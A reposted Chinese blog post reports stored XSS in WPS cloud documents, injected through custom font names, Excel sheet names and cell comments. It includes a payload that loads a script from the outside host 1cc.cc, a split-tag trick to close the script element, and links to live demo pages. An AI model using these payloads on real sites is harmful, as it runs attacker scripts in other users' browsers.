vlambda博客
学习文章列表

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

刹客网络科技资讯
点击右侧关注,最新科技资讯!


我前几天看到wps嵌入一个在web的线模板(之前没接触过wps),我第一反应就是这不安全,果断有漏洞可寻。

今天下载了wps测试。

1、office---所有字体名称导致xss

模板没有,超链接亦没有,我就看看字体,发现,可以自定义字体。拿">'><iframe>试,真的有漏洞。

在插入脚本时

"><script/src=//1cc.cc/l3>
发现执行不了,换了浏览器亦不行。但脚本已经插入到页面,考虑到是标签闭合的原因,于是就设置了两组

如图
<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
在汉字里设置字体为

  1. "><script/src=//1cc.cc/l3>

复制代码

<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
在英文里设置字体为

  1. </script>

复制代码

这样就闭合了,然后分享保存到云端,经测试成功。
<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
演示:http://qing.wps.cn/p/9506637

2、excel

①如果sheet名为代码,web浏览时会执行。

<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
②如果单元格的标注为代码,web浏览时会执行

<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 

<ignore_js_op>

关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

 
演示:http://qing.wps.cn/l/11dfd221c7d64f1c980b8be152b9b8fa

3、ppt 所有字体导致xss


关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)


关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

点分享


关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

点收藏

点点赞

点在看